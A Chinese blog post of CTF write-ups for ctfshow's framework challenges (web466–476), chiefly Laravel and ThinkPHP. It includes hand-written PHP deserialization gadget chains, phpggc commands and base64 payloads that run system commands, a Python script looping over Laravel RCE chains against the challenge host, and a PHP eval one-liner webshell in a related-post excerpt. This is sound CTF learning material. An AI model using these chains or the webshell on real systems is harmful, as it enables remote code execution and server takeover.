ctfshow 框架复现

已于 2024-05-05 20:15:41 修改
阅读量490 收藏 3
点赞数 5
分类专栏: CTFSHOW刷题日记 文章标签: 安全
于 2024-05-05 20:15:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/akdelt/article/details/138472866
版权

文章目录

web 466

Laravel5.4版本 ,提交数据需要base64编码

代码审计学习—Laravel5.4 - 先知社区 (aliyun.com)

用第二条链子

反序列化格式 /admin/序列化串base64

<?php
namespace Illuminate\Validation {
    class Validator {
        public $extensions = [];
        public function __construct() {
            $this->extensions = ['' => 'system'];
        }
    }
}

namespace Illuminate\Broadcasting {
    use  Illuminate\Validation\Validator;
    class PendingBroadcast {
        protected $events;
        protected $event;
        public function __construct($cmd)
        {
            $this->events = new Validator();
            $this->event = $cmd;
        }
    }
    echo base64_encode(serialize(new PendingBroadcast('cat /flag')));
}
?>

web 467

Laravel5.5版本 提交数据需要base64编码

参考文章:Laravel5.4 反序列化漏洞挖掘 - 先知社区 (aliyun.com)

第三条链子

<?php
namespace Illuminate\Broadcasting
{
    use  Illuminate\Events\Dispatcher;
    class PendingBroadcast
    {
        protected $events;
        protected $event;
        public function __construct($cmd)
        {
            $this->events = new Dispatcher($cmd);
            $this->event=$cmd;
        }
    }
    echo base64_encode(serialize(new PendingBroadcast("cat /flag")));
}


namespace Illuminate\Events
{
    class Dispatcher
    {
        protected $listeners;
        public function __construct($event){
            $this->listeners=[$event=>['system']];
        }
    }
}

web 468

Laravel5.5版本 提交数据需要base64编码

我们已经知道原理了,直接工具打吧

从0到1掌握反序列化工具之PHPGGC - 先知社区 (aliyun.com)

查看各种应用各种版本的链子

./phpggc -l

image-20240505163827557

生成链子,这里我们用 RCE3

./phpggc Laravel/RCE3 system "cat /f*"|base64

生成后发现不行,反序列化结果会被调试页面覆盖

image-20240505163722757

那只能带外了

./phpggc Laravel/RCE3 system "cat /f* >1.txt"|base64

image-20240505163749678

Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6MTp7czo5OiIAKgBldmVudHMiO086Mzk6IklsbHVtaW5hdGVcTm90aWZpY2F0aW9uc1xDaGFubmVsTWFuYWdlciI6Mzp7czo2OiIAKgBhcHAiO3M6MTQ6ImNhdCAvZiogPjEudHh0IjtzOjE3OiIAKgBkZWZhdWx0Q2hhbm5lbCI7czoxOiJ4IjtzOjE3OiIAKgBjdXN0b21DcmVhdG9ycyI7YToxOntzOjE6IngiO3M6Njoic3lzdGVtIjt9fX0K

然后访问 1.txt 就行了

web469

Laravel5.5版本 提交数据需要base64编码

Laravel RCE3 用不了了,我们用 4

./phpggc Laravel/RCE4 system "cat /f*"|base64

Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MzE6IklsbHVtaW5hdGVcVmFsaWRhdGlvblxWYWxpZGF0b3IiOjE6e3M6MTA6ImV4dGVuc2lvbnMiO2E6MTp7czowOiIiO3M6Njoic3lzdGVtIjt9fXM6ODoiACoAZXZlbnQiO3M6NzoiY2F0IC9mKiI7fQo=

web 470

又出现 debug 页面了。而且还得换 RCE9

./phpggc Laravel/RCE9 system "cat /f* > 1.txt"|base64

Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MjU6IklsbHVtaW5hdGVcQnVzXERpc3BhdGNoZXIiOjU6e3M6MTI6IgAqAGNvbnRhaW5lciI7TjtzOjExOiIAKgBwaXBlbGluZSI7TjtzOjg6IgAqAHBpcGVzIjthOjA6e31zOjExOiIAKgBoYW5kbGVycyI7YTowOnt9czoxNjoiACoAcXVldWVSZXNvbHZlciI7czo2OiJzeXN0ZW0iO31zOjg6IgAqAGV2ZW50IjtPOjM4OiJJbGx1bWluYXRlXEJyb2FkY2FzdGluZ1xCcm9hZGNhc3RFdmVudCI6MTp7czoxMDoiY29ubmVjdGlvbiI7czoxNToiY2F0IC9mKiA+IDEudHh0Ijt9fQo=

然后访问 1.txt

web 471

和上面一样

web 472

Laravel8.1版本 提交数据需要base64编码

写一个脚本遍历所有 rce

import os
import requests
 
for i in range(1,20):
    data=os.popen(f"./phpggc  Laravel/RCE{i} system 'cat /f* >1.txt'|base64").read()
    url = f"https://36c90604-17a4-483d-b420-c4a064444212.challenge.ctf.show/admin/{data}"
    requests.get(url)
    res = requests.get("https://36c90604-17a4-483d-b420-c4a064444212.challenge.ctf.show/1.txt").text
    if 'ctfshow' in res:
    	 print(res)
         print(f"RCE{i}success!")

python3 attack.py

image-20240505193439366

web 473

thinkphp5.0.15默认控制器的部分代码,使用默认路由:
public function inject(){
     $a=request()->get('a/a');
     db('users')->insert(['username'=>$a]);
     return 'done';
    
    }

快一点吧直接工具梭哈了

image-20240505194224848

web 474

Thinkphp v5.x 远程代码执行漏洞复现及POC集合-CSDN博客

扫这个没有

https://c5996b11-8db9-42d8-a43d-2ac4d7f5e605.challenge.ctf.show/public/index.php

得扫目录

https://c5996b11-8db9-42d8-a43d-2ac4d7f5e605.challenge.ctf.show/public

但是没有回显,写🐎进去

image-20240505200253173

蚁剑连接

image-20240505200317202

web 475

image-20240505201021946

web 476

image-20240505201344360

ctfshow-web477(CMS)
m0_62094846的博客
09-13 746
这个网站是用cmseasy搭建的,找一下cmseasy漏洞。网页是这样的,刚好和题目的网站对应上,版本是5.7。要进入管理界面,试一下在url后面输入admin。试用admin admin账号密码登录,成功。这里要在模块里面点编辑模块,这里没有。可能是版本不对 这里要7.3.8。1.试一下任意文件操作。再试一下代码执行漏洞。
CTFShow-WEB入门篇--信息搜集详细Wp_ctfshow web
2401_84297944的博客
04-28 1002
F12。
CTFSHOW框架复现
羽的博客
06-28 1288
CTFSHOW 框架复现
ctfshow 框架复现 工具版
最新发布
2301_81040377的博客
07-26 528
首先下载工具PHPGGC。
CTFSHOW 菜鸡杯 差一点 复现
wu_zh1_hui的博客
08-30 279
本来想参加这次比赛的,结果忘记时间了,想起来的时候已经是半夜了,看了一眼题目发现不会,就安心 地睡觉去了,第二天起来和师傅们交流了一下,看了看师傅们的wp,确定了自己不会,就放心地看师傅们的wp去了。 1.差一点 题目给了一个文本文件。 [][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[
ctfshow web入门 内网渗透篇
羽的博客
06-26 2477
首先在登录函数中存在doFilter对传入的用户名密码进行过滤,所以很难去注入。再来看下另外一台靶机,因为存在web服务,但是又不能出网所以通过ssh端口映射到本地来。没错,可以用phar,毕竟我们还有个文件上传的功能,后面需要做的就是这么触发phar。没有使用doFilter函数过滤,只是要求了我们传入的参数需要符合email格式。先看下445端口,靶机给我们提供了msf,所以直接用msf打下Samba。在api/index.php中存在一个写文件的功能,假如可以控制。的值,就可以写入一个木马进去。
ctfshow web系列
RealIiikun的博客
04-07 1061
源代码要求v1为为字母,v2为数字,并且v1与v2的md5值相同md5漏洞介绍:PHP在处理字符串时,它把每一个以“0E”开头的哈希值都解释为0所以只要v1与v2的md5值以0E开头即可。常见的0e开头的MD5和原值QNKCDZO240610708。
Web】CTFSHOW元旦水友赛部分wp_ctfshow元旦水友赛wp
2401_84281629的博客
04-27 890
这里主要是 ,file://协议支持以file://localhost/etc/hosts的方式访问服务器文件,来绕过开头必须是字母的限制。
2024年CTFSHOW-Web入门题解(更新中)
2401_84252743的博客
05-01 584
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
2024年网安最新ctfshow-WEB-web6_ctf(1)
2401_84297899的博客
05-03 1086
ctf.show WEB模块第6关是一个SQL注入漏洞,注入点是单引号字符型注入,并且过滤了空格,我们可以使用括号()或者注释/**/绕过先来一个万能账号,注意使用括号()替换空格,用户名输入以下payload,密码随便输成功登录既然是SQL注入漏洞,那么flag肯定就藏在当前使用的数据库中,我们使用获取当前使用的数据库,用户名输入以下payload,密码随便输当前数据库是web2。
ctfshow web其他 web450--web460
2301_81040377的博客
06-23 506
所以是能够回调到并且返回true的。代码没有变,但是没有回显flag。用php伪协议外带写入文件。
ctfshow 框架复现 web467-web475
cht6667的博客
02-23 526
通过使用工具通过,以后仔细研究原理,读者可以自己研究相关实现细节
CTFshow刷题日记-WEB-JAVA(web279-300)Struts2全漏洞复现,Java漏洞复现
热门推荐
Love&Share
10-12 1万+
全部题都是struts2框架漏洞 Struts2是用Java语言编写的一个基于MVC设计模式的Web应用框架 关于struts2漏洞,vulhub都有环境并且给出了漏洞原理和poc GitHub项目地址:https://github.com/vulhub/vulhub/tree/master/struts2 判断网站是否基于Struts2的方法链接 通过页面回显的错误消息来判断,页面不回显错误消息时则无效 通过网页后缀来判断,如.do .action,有可能不准 如果配置文件中常数extension的值
ctfshow web4-6
qq_61988806的博客
12-07 2933
web4 4和3 都有include 尝试构建和3一样发现失败了 想到从网站日志下手 日志路径/var/log/nginx/access.log 构建/?url=/var/log/nginx/access.log 同时burp抓包并转到request中 通过一句话木马连接<?php eval($_POST['xuyun'])?> 木马放在User-Agent 后面 通过蚁剑连接 链接:https://pan.baidu.com/s/1...
CTFshow web66 67 68 69 70 71
ChenD的学习笔记
11-13 1044
CTFshow web66 web67 web68 web69 web70 web71
CTFSHOW大赛原题篇(web756-web770)
羽的博客
03-04 1195
因为题目较多,所以很多地方写的比较简略,望师傅们谅解。。 文章目录web756web757web758web759web760web761web762web782web785web786web787web788web789 web756 code=GLOBALS web757 每次传入的key前七个字符需要是上传返回的,并且substr(md5($value),5,4)==0) 因为不是每一次md5都有可能字母开头,所以我们需要多测试几次,直接在给的key后面不断加字符就可以了。 import reque
CTFShow web入门刷题记录-爆破
打酱油的杯具的博客
11-29 2355
CTFShow web入门刷题记录-爆破 web21 先下载提供的密码包,查看hint得知考点为tomcat 账号提示为amdin,点击提交并使用burpsuit抓包 发现底下为一串经过base64编码的文字,翻译后得知为admin: 得知提交格式为:账号:密码 传入intruder,选中并添加$ [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xsSzs95u-1606660930041)(C:/Users/%E8%83%A1%E5%A5%87/AppData/Roami
CTF show WEB 1-4
羽的博客
02-15 7045
1.web签到题 直接源代码查看 2.web2 直接尝试万能密码,登陆成功 order by查找回显数 在3时正常回显,4是无回显,说明回显数为3 使用union select 联合查询爆库名 爆表名 爆字段 爆flag值 ...
ctf.show-web-1000题
weixin_46079186的博客
12-07 5959
信息收集 爆破 命令执行 文件包含 php特性 文件上传 sql注入 反序列化 java 代码审计 phpCVE XSS nodejs jwt SSRF SSTI XXE 区块链安全 黑盒测试
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值